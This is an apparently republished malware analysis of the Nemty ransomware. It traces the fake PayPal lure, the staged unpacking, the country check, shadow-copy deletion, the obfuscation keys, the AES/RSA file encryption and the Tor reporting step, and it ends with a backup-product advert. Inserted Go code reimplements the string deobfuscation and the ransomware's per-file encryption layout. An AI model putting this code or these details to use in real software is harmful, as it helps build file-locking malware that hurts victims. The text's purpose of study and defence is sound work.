Meet Nemty ransomware from a fake PayPal site

A new ransomware called Nemty has appeared, believed to be a successor of GandCrab or Buran. The malware is distributed mainly from a fake PayPal site and has several interesting features. How this ransomware works is described in detail below.

The new Nemty ransomware was discovered by the user nao_sec on September 7, 2019. The malware was distributed through a site disguised as PayPal; it is also possible for the ransomware to reach a computer via the RIG exploit kit. The attackers used social engineering to get the user to run the file cashback.exe, supposedly received from the PayPal site. Curiously, Nemty specifies the wrong port for the local Tor proxy service, which prevents the malware from sending its data to the server. As a result, a user who intends to pay the ransom and wait for the attackers' decryptor has to upload the encrypted data to the Tor service by hand.

Several features of Nemty suggest that it was developed by the same people, or by cybercriminals connected with Buran and GandCrab:

  • Like GandCrab, Nemty contains an Easter egg: a link to a picture of Russian President Vladimir Putin with an obscene joke. The legacy GandCrab ransomware carried an image with the same caption.
  • Language artifacts in both programs point to the same Russian-speaking authors.
  • It is the first ransomware to use an 8192-bit RSA key. The size buys nothing in practice: a 2048-bit RSA key is already beyond any known factoring attack, so the only effect is a slower key import and a larger key blob to carry around.
  • Like Buran, the ransomware is written in Object Pascal and compiled with Borland Delphi.

Static Analysis

The malicious code executes in four stages. The first stage is running cashback.exe, a PE32 executable for MS Windows, 1198936 bytes in size. Its code is written in Visual C++ and was compiled on October 14, 2013. It contains an archive that is unpacked automatically when cashback.exe runs. The program uses the Cabinet.dll library and its functions FDICreate(), FDIDestroy() and others to extract the files from the .cab archive.

SHA-256: A127323192ABED93AED53648D03CA84DE3B5B006B641033EB46A520B7A3C16FC

After the archive is unpacked, three files appear.

Next, temp.exe is launched: a PE32 executable for MS Windows, 307200 bytes in size. Its code is written in Visual C++ and packed with MPRESS, a packer similar to UPX.

SHA-256: EBDBA4B1D1DE65A1C6B14012B674E7FA7F8C5F5A8A5A2A9C3C338F02DD726AAD

The next stage is ironman.exe. Once started, temp.exe decrypts the data embedded in temp and turns it into ironman.exe, a PE32 executable of 544768 bytes. Its code was compiled with Borland Delphi.

SHA-256: 2C41B93ADD9AC5080A12BF93966470F8AB3BDE003001492A10F63758867F2A88

The final stage is the relaunch of ironman.exe. At run time it rewrites its own code and executes itself from memory. This in-memory version of ironman.exe is the malicious one, and it performs the encryption.

Attack vector

Currently, Nemty ransomware is distributed via the site pp-back.info.

The full infection chain can be viewed in the app.any.run sandbox.

Installation

Cashback.exe is the start of the attack. As mentioned above, cashback.exe unpacks the .cab file it contains. It then creates a folder TMP4351$.TMP of the form %TEMP%\IXPxxx.TMP, where xxx is a number from 001 to 999.

Then a registry value is created that looks like this:

[HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0]
"rundll32.exe" "C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\MALWAR~1\AppData\Local\Temp\IXPxxx.TMP""

It is used to delete the unpacked files at the next logon. These artifacts (the IXPxxx.TMP directory, the wextract_cleanup RunOnce value, advpack.dll's DelNodeRunDLL32) are those of Microsoft's IExpress/wextract self-extracting stub, which is also why cashback.exe carries a 2013 compile timestamp: the wrapper is Microsoft's, only the payload inside the .cab is the attacker's. Finally, cashback.exe starts the temp.exe process.

Temp.exe is the second stage of the infection chain

This is the process launched by cashback.exe, the second stage of execution. It attempts to download AutoHotKey, a scripting tool for Windows, and run the WindowSpy.ahk script stored in the resource section of the PE file.

The WindowSpy.ahk script decrypts the temp file into ironman.exe using the RC4 algorithm with the password IwantAcake. The RC4 key is derived from the password with the MD5 hash algorithm.

temp.exe then launches the ironman.exe process.

Ironman.exe is the third stage

Ironman.exe reads the contents of the file iron.bmp and creates a file iron.txt containing the cryptolocker that will be launched next.

After that, the malware loads iron.txt into memory and relaunches it as ironman.exe; iron.txt is then deleted.

ironman.exe is the main component of NEMTY ransomware, the one that encrypts files on the infected computer. The malware creates a mutex named hate.

The first thing it does is determine where the computer is located. Nemty opens a browser and obtains the external IP address from http://api.ipify.org. It then queries api.db-ip.com/v2/free/[IP]/countryName to resolve the country from that IP, and if the computer is in one of the regions below, execution of the malicious code stops:

  • Russia
  • Belarus
  • Ukraine
  • Kazakhstan
  • Tajikistan

The developers evidently do not want to attract the attention of law enforcement in the countries where they live, so they do not encrypt files in their "home" regions.

If the victim's IP address is not in the list above, the malware encrypts the user's data.

To prevent file recovery, the shadow copies are deleted.

It then builds a list of files and folders that will not be encrypted, and a list of file extensions to skip:

  • windows
  • $RECYCLE.BIN
  • rsa
  • NTDETECT.COM
  • ntldr
  • MSDOS.SYS
  • IO.SYS
  • boot.ini
  • AUTOEXEC.BAT
  • ntuser.dat
  • desktop.ini
  • CONFIG.SYS
  • BOOTSECT.BAK
  • bootmgr
  • programdata
  • appdata
  • osoft
  • Common Files

Skipped extensions and name patterns: log LOG CAB cab CMD cmd COM com cpl CPL exe EXE ini INI dll DLL lnk LNK url URL ttf TTF DECRYPT.txt NEMTY

Obfuscation

To hide URLs and embedded configuration data, Nemty uses base64 together with the RC4 algorithm under the keyword fuckav.

In the binary, decoding goes through CryptStringToBinary (the base64 step) followed by RC4 decryption with that key.
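As an added example (mine, not code from the original analysis or from the Nemty authors), here is the string-obfuscation step in Go: RC4 under the literal key "fuckav" followed by base64, plus the MD5-derived RC4 key that the WindowSpy.ahk stage uses for the password IwantAcake. The sample string is constructed, and treating "fuckav" as raw key bytes (rather than hashing it) is an assumption; the write-up does not say how that key is derived.

```go
package main

import (
	"crypto/md5"
	"crypto/rc4"
	"encoding/base64"
	"fmt"
)

// ConfigKey is the RC4 keyword reported for embedded URLs and configuration
// strings. Assumption: it is used directly as the key bytes.
var ConfigKey = []byte("fuckav")

// StageKey is the RC4 key of the temp -> ironman.exe stage: per the analysis,
// the key is the MD5 digest of the password IwantAcake.
var StageKey = AhkRC4Key("IwantAcake")

// AhkRC4Key derives a 16-byte RC4 key as MD5(password).
func AhkRC4Key(password string) []byte {
	sum := md5.Sum([]byte(password))
	return sum[:]
}

// rc4Xor runs RC4 over data; the same operation encrypts and decrypts.
func rc4Xor(key, data []byte) ([]byte, error) {
	c, err := rc4.NewCipher(key)
	if err != nil {
		return nil, err
	}
	out := make([]byte, len(data))
	c.XORKeyStream(out, data)
	return out, nil
}

// ObfuscateString is the storage direction: RC4, then base64.
func ObfuscateString(key []byte, plain string) (string, error) {
	ct, err := rc4Xor(key, []byte(plain))
	if err != nil {
		return "", err
	}
	return base64.StdEncoding.EncodeToString(ct), nil
}

// DeobfuscateString reverses it: base64 decode (the CryptStringToBinary step
// in the binary), then RC4 under the same key.
func DeobfuscateString(key []byte, enc string) (string, error) {
	ct, err := base64.StdEncoding.DecodeString(enc)
	if err != nil {
		return "", err
	}
	pt, err := rc4Xor(key, ct)
	if err != nil {
		return "", err
	}
	return string(pt), nil
}

func main() {
	// Constructed sample: one of the URLs the binary contacts.
	enc, err := ObfuscateString(ConfigKey, "http://api.ipify.org")
	if err != nil {
		panic(err)
	}
	dec, _ := DeobfuscateString(ConfigKey, enc)
	fmt.Printf("stored: %s\nrecovered: %s\nstage key: %x\n", enc, dec, StageKey)
}
```

Against a real sample, the base64 blobs pulled out of the .data section are fed to DeobfuscateString with ConfigKey; the same function with StageKey is the starting point for recovering the temp payload, once the RC4 mode used by the AutoHotkey script has been matched.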

Encryption

Nemty uses three layers of encryption:

  • AES-128-CBC for files. The 128-bit AES key is generated randomly and is the same for all files. It is stored in the configuration file on the victim's computer. The IV is generated randomly for each file and stored in the encrypted file.
  • RSA-2048 to encrypt the per-file IV. A session key pair is generated; the session private key is stored in the configuration file on the victim's computer.
  • RSA-8192. A master public key is embedded in the program and is used to encrypt the configuration file, which holds the AES key and the session RSA-2048 private key.

Nemty generates 32 bytes of random data; the first 16 bytes are used as the AES-128-CBC key.

The second algorithm is RSA-2048. The key pair is generated with CryptGenKey() and imported with CryptImportKey().

Once the session keys have been generated, the public key is imported into the MS Cryptographic Service Provider, followed by the private key.

Finally, RSA-8192. The master public key is stored in obfuscated form (Base64 + RC4) in the .data section of the PE file, and is recovered by base64 decoding followed by RC4 decryption under the password fuckav.

As a result, the overall encryption procedure is as follows:

  • Generate a 128-bit AES key that will be used to encrypt all files.
  • Generate an IV for each file.
  • Generate a session RSA-2048 key pair.
  • Decrypt the embedded RSA-8192 master public key (base64 and RC4).
  • Encrypt the file contents with AES-128-CBC under the key from the first step.
  • Encrypt the IV with the session RSA-2048 public key and base64-encode it.
  • Append the encrypted IV to the end of each encrypted file.
  • Add the AES key and the session RSA-2048 private key to the configuration.
  • Encrypt the configuration data, described in the section "Collecting information about the infected computer", with the RSA-8192 master key.

Each encrypted file therefore consists of the AES-CBC ciphertext followed by the base64-encoded, RSA-2048-encrypted IV, with the FileID marker described below also appended to the file.
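The procedure above carried through as an added Go example (mine, not the article's or the malware's code): 32 random bytes of which the first 16 become the AES-128 key, a fresh IV per file, the file body under AES-128-CBC, the IV wrapped with the session RSA-2048 public key, base64-encoded and appended, then the _NEMTY_[FileID]_ marker. PKCS#7 block padding, PKCS#1 v1.5 for the RSA wrap (the CryptoAPI CryptEncrypt default), and the order IV-then-marker in the trailer are assumptions; the RSA-8192 wrapping of the configuration is left out. DecryptFile is what a decryptor built from the session private key has to do; the FileID tgdLYrd and the plaintext are constructed.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"crypto/rsa"
	"encoding/base64"
	"errors"
	"fmt"
)

// VictimKeys is the per-machine material described above: 32 random bytes
// (the first 16 are the AES-128 key) and a session RSA-2048 pair.
type VictimKeys struct {
	AESKey  []byte
	Session *rsa.PrivateKey
}

func GenerateVictimKeys() (*VictimKeys, error) {
	buf := make([]byte, 32)
	if _, err := rand.Read(buf); err != nil {
		return nil, err
	}
	priv, err := rsa.GenerateKey(rand.Reader, 2048)
	if err != nil {
		return nil, err
	}
	return &VictimKeys{AESKey: buf[:16], Session: priv}, nil
}

// block builds the AES cipher; a 16-byte key from GenerateVictimKeys cannot fail.
func (k *VictimKeys) block() cipher.Block {
	b, err := aes.NewCipher(k.AESKey)
	if err != nil {
		panic(err)
	}
	return b
}

// PKCS#7 padding (assumed; the write-up does not name the padding scheme).
func pkcs7Pad(b []byte) []byte {
	n := aes.BlockSize - len(b)%aes.BlockSize
	return append(b, bytes.Repeat([]byte{byte(n)}, n)...)
}

func pkcs7Unpad(b []byte) ([]byte, error) {
	n := 0
	if len(b) > 0 {
		n = int(b[len(b)-1])
	}
	if n == 0 || n > aes.BlockSize || len(b)%aes.BlockSize != 0 ||
		!bytes.Equal(b[len(b)-n:], bytes.Repeat([]byte{byte(n)}, n)) {
		return nil, errors.New("bad padding")
	}
	return b[:len(b)-n], nil
}

// EncryptFile writes the layout: ciphertext || base64(RSA2048(IV)) || "_NEMTY_<FileID>_".
func EncryptFile(k *VictimKeys, fileID string, plain []byte) ([]byte, error) {
	iv := make([]byte, aes.BlockSize)
	if _, err := rand.Read(iv); err != nil {
		return nil, err
	}
	padded := pkcs7Pad(plain)
	ct := make([]byte, len(padded))
	cipher.NewCBCEncrypter(k.block(), iv).CryptBlocks(ct, padded)
	encIV, err := rsa.EncryptPKCS1v15(rand.Reader, &k.Session.PublicKey, iv) // assumed padding
	if err != nil {
		return nil, err
	}
	out := append(ct, base64.StdEncoding.EncodeToString(encIV)...)
	return append(out, "_NEMTY_"+fileID+"_"...), nil
}

// DecryptFile strips the marker, unwraps the IV with the session private key,
// and decrypts the body; a file carrying a different FileID is rejected.
func DecryptFile(k *VictimKeys, fileID string, blob []byte) ([]byte, error) {
	marker := []byte("_NEMTY_" + fileID + "_")
	if !bytes.HasSuffix(blob, marker) {
		return nil, errors.New("FileID marker missing")
	}
	body := blob[:len(blob)-len(marker)]
	ivLen := base64.StdEncoding.EncodedLen(k.Session.Size()) // 344 chars for RSA-2048
	if len(body) < ivLen {
		return nil, errors.New("truncated file")
	}
	ct, b64 := body[:len(body)-ivLen], body[len(body)-ivLen:]
	encIV, err := base64.StdEncoding.DecodeString(string(b64))
	if err != nil {
		return nil, err
	}
	iv, err := rsa.DecryptPKCS1v15(rand.Reader, k.Session, encIV)
	if err != nil || len(iv) != aes.BlockSize {
		return nil, errors.New("IV unwrap failed")
	}
	plain := make([]byte, len(ct))
	cipher.NewCBCDecrypter(k.block(), iv).CryptBlocks(plain, ct)
	return pkcs7Unpad(plain)
}

func main() {
	k, err := GenerateVictimKeys()
	if err != nil {
		panic(err)
	}
	blob, _ := EncryptFile(k, "tgdLYrd", []byte("constructed sample document"))
	plain, err := DecryptFile(k, "tgdLYrd", blob)
	fmt.Printf("%d bytes on disk, recovered %q, err=%v\n", len(blob), plain, err)
}
```

The point the code makes concrete: everything the decryptor needs besides the AES key is the session RSA-2048 private key, and that key leaves the victim's machine only inside the configuration wrapped under the attacker's RSA-8192 master key. The size of the master key changes nothing about recovery; what matters is that its private half never touches the host.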

Collecting information about the infected computer

The ransomware collects the keys needed to decrypt the infected files so that the attacker can build a decryptor. In addition, Nemty gathers user data such as the login name, the computer name and the hardware profile.

It calls GetLogicalDrives(), GetFreeSpace() and GetDriveType() to collect information about the drives of the infected computer.

The collected information is stored in a configuration file. After decoding the strings, the list of parameters in the configuration file emerges; its template can be represented as follows:

{"General": {"IP":"[IP]", "Country":"[Country]", "ComputerName":"[ComputerName]", "Username":"[Username]", "OS": "[OS]", "isRU":false, "version":"1.4", "CompID":"{[CompID]}", "FileID":"_NEMTY_[FileID]_", "UserID":"[ UserID]", "key":"[key]", "pr_key":"[pr_key]

Nemty stores the collected data in JSON form in the file %USER%\_NEMTY_[FileID]_.nemty. The FileID is 7 characters long and generated randomly, for example _NEMTY_tgdLYrd_.nemty. The FileID is also appended to the end of each encrypted file.

Ransom note

After the files have been encrypted, a file _NEMTY_[FileID]-DECRYPT.txt appears on the computer. At the end of the note is the encrypted information about the infected computer.

Network communication

The ironman.exe process downloads a Tor distribution from https://dist.torproject.org/torbrowser/8.5.4/tor-win32-0.4.0.5.zip and tries to install it.

Nemty then attempts to send the configuration data to 127.0.0.1:9050, where it expects to find a working Tor browser proxy. By default, however, the Tor browser's SOCKS proxy listens on port 9150, while port 9050 is the port of the Tor daemon on Linux or of the Expert Bundle on Windows. Consequently, no data reaches the attacker's server. Instead, the victim can upload the configuration file manually by visiting the Nemty decryption service over Tor through the link given in the ransom note.

The request itself is an HTTP GET to 127.0.0.1:9050/public/gate?data= with the configuration in the query string. Note that the archive fetched above, tor-win32-0.4.0.5.zip, is the Expert Bundle (a bare tor.exe), which would listen on 9050 if it were installed and running; in the observed runs the installation attempt did not yield a working proxy and nothing was sent.

The Nemty decryption service on the Tor network lets a victim upload an encrypted image (jpg, png, bmp) to test decryption. After that, the attacker demands the ransom; if it is not paid in time, the price doubles.

Conclusion

At present it is not possible to decrypt files encrypted by Nemty without paying the ransom. This ransomware shares traits with Buran and the older GandCrab: compilation in Borland Delphi and images with the same caption. It is also the first encryptor to use an 8192-bit RSA key, which serves no purpose, since even a 2048-bit key is beyond practical attack. Finally, and curiously, it tries to use the wrong port for the local Tor proxy service.

However, Acronis Backup and Acronis True Image prevent Nemty ransomware from reaching users' PCs and data, and service providers can protect their customers with Acronis Backup Cloud. Complete cyber protection offers not only backup but also protection through Acronis Active Protection, a technology based on artificial intelligence and behavioural heuristics that can neutralise even previously unknown malware.

Source: www.habr.com
